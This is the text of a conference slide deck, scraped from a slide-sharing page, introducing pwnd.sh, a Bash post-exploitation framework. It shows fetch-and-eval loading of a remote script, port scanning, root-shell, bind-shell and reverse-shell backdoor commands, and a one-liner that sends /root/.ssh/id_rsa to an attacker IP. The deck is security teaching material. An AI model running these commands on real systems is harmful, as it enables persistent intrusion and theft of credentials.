pwnd.sh

PWND.sh
Post Exploitation Framework
Agenda
SCENARIO: Have already compromised a Linux machine

What’s next after exploiting

Different functionalities of pwnd.sh

Q/A
./about_me.py
[+] Got name : Chandrapal
[+] Website : chandrapal.me
[+] Founder of : Hack with GitHub
[+] Social Accounts : @bnchandrapal
@HackwithGithub
[-] Life :
Traceback (most recent call last) :
File “about_me.py”, line 150, in <module>
TypeError: Can’t convert ‘infosec’ object to developer implicitly
Author
Itzek Kotler (@itzikkotler)
CTO & Co-founder @ SafeBreach
http://ikotler.org
What plans in Post Exploitation Phase
3 possible things:
●
Further penetrate into Network / Endpoints
●
Get a firmer foothold on the Network / Endpoints
●
Start Exfiltrating Data out of the Network / Endpoints
About the tool
●
Newly released
●
Easy as it is written in BASH
●
Interactive and allows to create custom scripts
●
License: 3-Clause BSD
●
Both In-Memory and On-Disk deployment available
●
Pipeline integrates pwnd.sh with other programs also
How can I get it ?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh
Why Bash and not Python / Perl / Ruby ?
●
Same Bash for different Platforms (Mac, Linux, etc) and different
architectures (x86, x64)
●
It is the default shell on most systems
●
There is socket programming in Bash (--enable-net-redirections)
●
You cannot fallback to Bash from Python, Perl, etc but you can
UPGRADE to Python, Perl, etc from Bash
Dependencies, or not to be Depended?
●
No:
– Consistent functionality across different Platforms, CPUs etc.
– Smaller and simpler code base
●
Yes:
– Don't reinvent the wheel
– Everything a Dependency in Shell Terms (ls, cat, etc)
(Good coders create, Great coders reuse)
PWND.SH – built with least amount of dependencies
Why In-memory?
●
Constraints found:
– Filesystem is readonly
– “No space left on device”
Solution: In-memory loading
●
Works even if the Filesystem is mounted to be Read-only
●
Multiple Versions can co-exists (in Multiple Shells)
●
Disappears after Reboot
Let’s Start
Metasploitable
192.168.70.101
Ubuntu
Find it
It’s me
192.168.70.100
Scenario :
In-Memory Loading Method #1
X=`curl -fsSL
"https://raw.githubusercontent.com/SafeBreac
h-Labs/pwndsh/master/bin/pwnd.sh"`
eval "$X"
What if the system is on
Intranet without
Internet ?
What if the system is in
Internet Censored
country where GitHub is
blocked ?
In-Memory Loading Method #2
● On source computer
curl -fsSL
"https://raw.githubusercontent.com/SafeBreach-
Labs/pwndsh/master/bin/pwnd.sh"
< Ctrl+Shift+C >
● On destination computer
X=”<Ctrl+V>”
eval “$X”
On-Disk Loading Method
> curl -OfsSL
"https://raw.githubusercontent.com/SafeBrea
ch-Labs/pwndsh/master/bin/pwnd.sh"
> source pwnd.sh
pwnd.sh
Scanning a Host
(pwnd) $ portscanner 192.168.2.132 22/tcp
Scanning Networks
(pwnd)$ for ip in $(seq 1 254); do
portscanner 192.168.0.$ip 123/udp; done
Local Backdoor Example
(pwnd)$ install_rootshell
# Remember to invoke rootshell with ‘-p’
Remote Backdoor Example
(pwnd)$ bindshell 1234
# Connect to host at 1234/tcp for rootshell
Remote Backdoor Example #2
# On 192.168.2.1 run: nc –l 1234
(pwnd)$ reverseshell 192.168.2.1 1234
Searching for Goodies
(pwnd)$ hunt_privkeys
Exfil Example
# On attacker machine run: nc –l <port>
(pwnd)$ cat /root/.ssh/id_rsa | base64 |
over_socket <attacker IP> <port>
Plugin Support
●
You can create plugins and add you to the project
●
All you need is:
– GitHub account
– Bash knowledge
– Time
Q&A
We have
HACKED WITH GITHUB
References
●
https://github.com/SafeBreach-Labs/pwndsh
●
http://www.ikotler.org/JustGotPWND.pdf
●
https://www.youtube.com/watch?v=kWU-fDv2wjM
Thank You
1 of 28

Recommended

OWASP Serverless Top 10 by
OWASP Serverless Top 10OWASP Serverless Top 10
OWASP Serverless Top 10Chandrapal Badshah
1K views55 slides
Detecting secrets in code committed to gitlab (in real time) by
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Chandrapal Badshah
835 views28 slides
Apache Struts2 CVE-2017-5638 by
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
565 views11 slides
Web & Cloud Security in the real world by
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real worldMadhu Akula
1.5K views37 slides
Introduction to Mod security session April 2016 by
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
1.1K views29 slides
Mod security by
Mod securityMod security
Mod securityShruthi Kamath
1.8K views15 slides

More Related Content

What's hot

Nessus and Reporting Karma by
Nessus and Reporting KarmaNessus and Reporting Karma
Nessus and Reporting Karman|u - The Open Security Community
7.7K views32 slides
[Wroclaw #7] Why So Serial? by
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
463 views75 slides
2600 av evasion_deuce by
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuceDb Cooper
2.9K views26 slides
[Wroclaw #7] AWS (in)security - the devil is in the detail by
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
187 views28 slides
LasCon 2014 DevOoops by
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops Chris Gates
54.2K views86 slides
[Php Camp]Owasp Php Top5+Csrf by
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
1.7K views30 slides

What's hot(20)

[Wroclaw #7] Why So Serial? by OWASP
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
OWASP463 views
2600 av evasion_deuce by Db Cooper
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
Db Cooper2.9K views
[Wroclaw #7] AWS (in)security - the devil is in the detail by OWASP
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
OWASP187 views
LasCon 2014 DevOoops by Chris Gates
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
Chris Gates54.2K views
[Php Camp]Owasp Php Top5+Csrf by Bipin Upadhyay
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
Bipin Upadhyay1.7K views
SSL Pinning and Bypasses: Android and iOS by Anant Shrivastava
SSL Pinning and Bypasses: Android and iOSSSL Pinning and Bypasses: Android and iOS
SSL Pinning and Bypasses: Android and iOS
Anant Shrivastava21.2K views
Nodejs Security by Jason Ross
Nodejs SecurityNodejs Security
Nodejs Security
Jason Ross293 views
Nsa and vpn by antitree
Nsa and vpnNsa and vpn
Nsa and vpn
antitree1.8K views
Web Application firewall-Mod security by Romansh Yadav
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
Romansh Yadav674 views
[Wroclaw #7] Security test automation by OWASP
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
OWASP162 views
Safe and Fast Automation on AWS for Fun and Profit by Raghavendra Prabhu
Safe and Fast Automation on AWS for Fun and ProfitSafe and Fast Automation on AWS for Fun and Profit
Safe and Fast Automation on AWS for Fun and Profit
Raghavendra Prabhu138 views
Linux Security for Developers by Michael Boelen
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
Michael Boelen3.4K views
Exploiting publically exposed Version Control System by Anant Shrivastava
Exploiting publically exposed Version Control SystemExploiting publically exposed Version Control System
Exploiting publically exposed Version Control System
Anant Shrivastava5.2K views
[OWASP Poland Day] Application frameworks' vulnerabilities by OWASP
[OWASP Poland Day] Application frameworks' vulnerabilities[OWASP Poland Day] Application frameworks' vulnerabilities
[OWASP Poland Day] Application frameworks' vulnerabilities
OWASP593 views
Ieee S&P 2020 - Software Security: from Research to Industry. by Minded Security
Ieee S&P 2020 - Software Security: from Research to Industry.Ieee S&P 2020 - Software Security: from Research to Industry.
Ieee S&P 2020 - Software Security: from Research to Industry.
Minded Security122 views
The Dark Side of PowerShell by George Dobrea by EC-Council
The Dark Side of PowerShell by George DobreaThe Dark Side of PowerShell by George Dobrea
The Dark Side of PowerShell by George Dobrea
EC-Council1.7K views
Demo of security tool nessus - Network vulnerablity scanner by Ajit Dadresa
Demo of security tool nessus - Network vulnerablity scannerDemo of security tool nessus - Network vulnerablity scanner
Demo of security tool nessus - Network vulnerablity scanner
Ajit Dadresa4.1K views

Similar to pwnd.sh

Linux 开源操作系统发展新趋势 by
Linux 开源操作系统发展新趋势Linux 开源操作系统发展新趋势
Linux 开源操作系统发展新趋势Anthony Wong
173 views107 slides
Tools and Process for Streamlining Mac Deployment by
Tools and Process for Streamlining Mac DeploymentTools and Process for Streamlining Mac Deployment
Tools and Process for Streamlining Mac DeploymentTimothy Sutton
341 views44 slides
Docker Introduction + what is new in 0.9 by
Docker Introduction + what is new in 0.9 Docker Introduction + what is new in 0.9
Docker Introduction + what is new in 0.9 Jérôme Petazzoni
3.7K views91 slides
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQ by
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQDocker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQ
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQJérôme Petazzoni
9.2K views91 slides
Docker and Containers for Development and Deployment — SCALE12X by
Docker and Containers for Development and Deployment — SCALE12XDocker and Containers for Development and Deployment — SCALE12X
Docker and Containers for Development and Deployment — SCALE12XJérôme Petazzoni
25.5K views82 slides
Adhocr T-dose 2012 by
Adhocr T-dose 2012Adhocr T-dose 2012
Adhocr T-dose 2012Gratien D'haese
709 views37 slides

Similar to pwnd.sh(20)

Linux 开源操作系统发展新趋势 by Anthony Wong
Linux 开源操作系统发展新趋势Linux 开源操作系统发展新趋势
Linux 开源操作系统发展新趋势
Anthony Wong173 views
Tools and Process for Streamlining Mac Deployment by Timothy Sutton
Tools and Process for Streamlining Mac DeploymentTools and Process for Streamlining Mac Deployment
Tools and Process for Streamlining Mac Deployment
Timothy Sutton341 views
Docker Introduction + what is new in 0.9 by Jérôme Petazzoni
Docker Introduction + what is new in 0.9 Docker Introduction + what is new in 0.9
Docker Introduction + what is new in 0.9
Jérôme Petazzoni3.7K views
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQ by Jérôme Petazzoni
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQDocker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQ
Docker Introduction, and what's new in 0.9 — Docker Palo Alto at RelateIQ
Jérôme Petazzoni9.2K views
Docker and Containers for Development and Deployment — SCALE12X by Jérôme Petazzoni
Docker and Containers for Development and Deployment — SCALE12XDocker and Containers for Development and Deployment — SCALE12X
Docker and Containers for Development and Deployment — SCALE12X
Jérôme Petazzoni25.5K views
Digital RSE: automated code quality checks - RSE group meeting by Henry Schreiner
Digital RSE: automated code quality checks - RSE group meetingDigital RSE: automated code quality checks - RSE group meeting
Digital RSE: automated code quality checks - RSE group meeting
Henry Schreiner423 views
How to Make a Honeypot Stickier (SSH*) by Jose Hernandez
How to Make a Honeypot Stickier (SSH*)How to Make a Honeypot Stickier (SSH*)
How to Make a Honeypot Stickier (SSH*)
Jose Hernandez223 views
the NML project by Lei Yang
the NML projectthe NML project
the NML project
Lei Yang597 views
Docker and-containers-for-development-and-deployment-scale12x by rkr10
Docker and-containers-for-development-and-deployment-scale12xDocker and-containers-for-development-and-deployment-scale12x
Docker and-containers-for-development-and-deployment-scale12x
rkr10112 views
Software Quality Assurance Tooling 2023 by Henry Schreiner
Software Quality Assurance Tooling 2023Software Quality Assurance Tooling 2023
Software Quality Assurance Tooling 2023
Henry Schreiner39 views
Workshop : 45 minutes pour comprendre Docker avec Jérôme Petazzoni by TheFamily
Workshop : 45 minutes pour comprendre Docker avec Jérôme PetazzoniWorkshop : 45 minutes pour comprendre Docker avec Jérôme Petazzoni
Workshop : 45 minutes pour comprendre Docker avec Jérôme Petazzoni
TheFamily1.4K views
Introduction to Docker, December 2014 "Tour de France" Edition by Jérôme Petazzoni
Introduction to Docker, December 2014 "Tour de France" EditionIntroduction to Docker, December 2014 "Tour de France" Edition
Introduction to Docker, December 2014 "Tour de France" Edition
Jérôme Petazzoni3.8K views
Talk 160920 @ Cat System Workshop by Quey-Liang Kao
Talk 160920 @ Cat System WorkshopTalk 160920 @ Cat System Workshop
Talk 160920 @ Cat System Workshop
Quey-Liang Kao297 views
PowerShell for SharePoint Developers by Boulos Dib
PowerShell for SharePoint DevelopersPowerShell for SharePoint Developers
PowerShell for SharePoint Developers
Boulos Dib1.1K views
Introduction to EasyBuild: Tutorial Part 1 by inside-BigData.com
Introduction to EasyBuild: Tutorial Part 1Introduction to EasyBuild: Tutorial Part 1
Introduction to EasyBuild: Tutorial Part 1
inside-BigData.com2.6K views
Containerization Is More than the New Virtualization by C4Media
Containerization Is More than the New VirtualizationContainerization Is More than the New Virtualization
Containerization Is More than the New Virtualization
C4Media694 views

More from Chandrapal Badshah

Dangling DNS records takeover at scale by
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
536 views25 slides
How to get started in InfoSec ? by
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?Chandrapal Badshah
568 views31 slides
OSINT mindset to protect your organization - Null monthly meet version by
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionChandrapal Badshah
363 views52 slides
OSINT Mindset to protect your Organization by
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationChandrapal Badshah
118 views24 slides
Solving OWASP MSTG CrackMe using Frida by
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaChandrapal Badshah
585 views20 slides
Pentesting Android Apps using Frida (Beginners) by
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Chandrapal Badshah
6.9K views36 slides

More from Chandrapal Badshah(9)

Recently uploaded

.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV by
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTVSplunk
86 views20 slides
Astera Labs: Intelligent Connectivity for Cloud and AI Infrastructure by
Astera Labs:  Intelligent Connectivity for Cloud and AI InfrastructureAstera Labs:  Intelligent Connectivity for Cloud and AI Infrastructure
Astera Labs: Intelligent Connectivity for Cloud and AI InfrastructureCXL Forum
125 views16 slides
Web Dev - 1 PPT.pdf by
Web Dev - 1 PPT.pdfWeb Dev - 1 PPT.pdf
Web Dev - 1 PPT.pdfgdsczhcet
52 views45 slides
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor... by
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...Vadym Kazulkin
70 views64 slides
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad... by
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad..."Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad...
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad...Fwdays
40 views30 slides
PharoJS - Zürich Smalltalk Group Meetup November 2023 by
PharoJS - Zürich Smalltalk Group Meetup November 2023PharoJS - Zürich Smalltalk Group Meetup November 2023
PharoJS - Zürich Smalltalk Group Meetup November 2023Noury Bouraqadi
113 views17 slides

Recently uploaded(20)

.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV by Splunk
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
.conf Go 2023 - How KPN drives Customer Satisfaction on IPTV
Splunk86 views
Astera Labs: Intelligent Connectivity for Cloud and AI Infrastructure by CXL Forum
Astera Labs:  Intelligent Connectivity for Cloud and AI InfrastructureAstera Labs:  Intelligent Connectivity for Cloud and AI Infrastructure
Astera Labs: Intelligent Connectivity for Cloud and AI Infrastructure
CXL Forum125 views
Web Dev - 1 PPT.pdf by gdsczhcet
Web Dev - 1 PPT.pdfWeb Dev - 1 PPT.pdf
Web Dev - 1 PPT.pdf
gdsczhcet52 views
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor... by Vadym Kazulkin
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...
How to reduce cold starts for Java Serverless applications in AWS at JCON Wor...
Vadym Kazulkin70 views
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad... by Fwdays
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad..."Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad...
"Ukrainian Mobile Banking Scaling in Practice. From 0 to 100 and beyond", Vad...
Fwdays40 views
PharoJS - Zürich Smalltalk Group Meetup November 2023 by Noury Bouraqadi
PharoJS - Zürich Smalltalk Group Meetup November 2023PharoJS - Zürich Smalltalk Group Meetup November 2023
PharoJS - Zürich Smalltalk Group Meetup November 2023
Noury Bouraqadi113 views
MemVerge: Past Present and Future of CXL by CXL Forum
MemVerge: Past Present and Future of CXLMemVerge: Past Present and Future of CXL
MemVerge: Past Present and Future of CXL
CXL Forum110 views
"Role of a CTO in software outsourcing company", Yuriy Nakonechnyy by Fwdays
"Role of a CTO in software outsourcing company", Yuriy Nakonechnyy"Role of a CTO in software outsourcing company", Yuriy Nakonechnyy
"Role of a CTO in software outsourcing company", Yuriy Nakonechnyy
Fwdays40 views
MemVerge: Memory Viewer Software by CXL Forum
MemVerge: Memory Viewer SoftwareMemVerge: Memory Viewer Software
MemVerge: Memory Viewer Software
CXL Forum118 views
JCon Live 2023 - Lice coding some integration problems by Bernd Ruecker
JCon Live 2023 - Lice coding some integration problemsJCon Live 2023 - Lice coding some integration problems
JCon Live 2023 - Lice coding some integration problems
Bernd Ruecker67 views
Webinar : Competing for tomorrow’s leaders – How MENA insurers can win the wa... by The Digital Insurer
Webinar : Competing for tomorrow’s leaders – How MENA insurers can win the wa...Webinar : Competing for tomorrow’s leaders – How MENA insurers can win the wa...
Webinar : Competing for tomorrow’s leaders – How MENA insurers can win the wa...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu... by NUS-ISS
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
Architecting CX Measurement Frameworks and Ensuring CX Metrics are fit for Pu...
NUS-ISS32 views
GigaIO: The March of Composability Onward to Memory with CXL by CXL Forum
GigaIO: The March of Composability Onward to Memory with CXLGigaIO: The March of Composability Onward to Memory with CXL
GigaIO: The March of Composability Onward to Memory with CXL
CXL Forum126 views
Transcript: The Details of Description Techniques tips and tangents on altern... by BookNet Canada
Transcript: The Details of Description Techniques tips and tangents on altern...Transcript: The Details of Description Techniques tips and tangents on altern...
Transcript: The Details of Description Techniques tips and tangents on altern...
BookNet Canada119 views
The details of description: Techniques, tips, and tangents on alternative tex... by BookNet Canada
The details of description: Techniques, tips, and tangents on alternative tex...The details of description: Techniques, tips, and tangents on alternative tex...
The details of description: Techniques, tips, and tangents on alternative tex...
BookNet Canada110 views
Understanding GenAI/LLM and What is Google Offering - Felix Goh by NUS-ISS
Understanding GenAI/LLM and What is Google Offering - Felix GohUnderstanding GenAI/LLM and What is Google Offering - Felix Goh
Understanding GenAI/LLM and What is Google Offering - Felix Goh
NUS-ISS39 views
AMD: 4th Generation EPYC CXL Demo by CXL Forum
AMD: 4th Generation EPYC CXL DemoAMD: 4th Generation EPYC CXL Demo
AMD: 4th Generation EPYC CXL Demo
CXL Forum126 views
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen... by NUS-ISS
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
Upskilling the Evolving Workforce with Digital Fluency for Tomorrow's Challen...
NUS-ISS23 views
CXL at OCP by CXL Forum
CXL at OCPCXL at OCP
CXL at OCP
CXL Forum208 views

pwnd.sh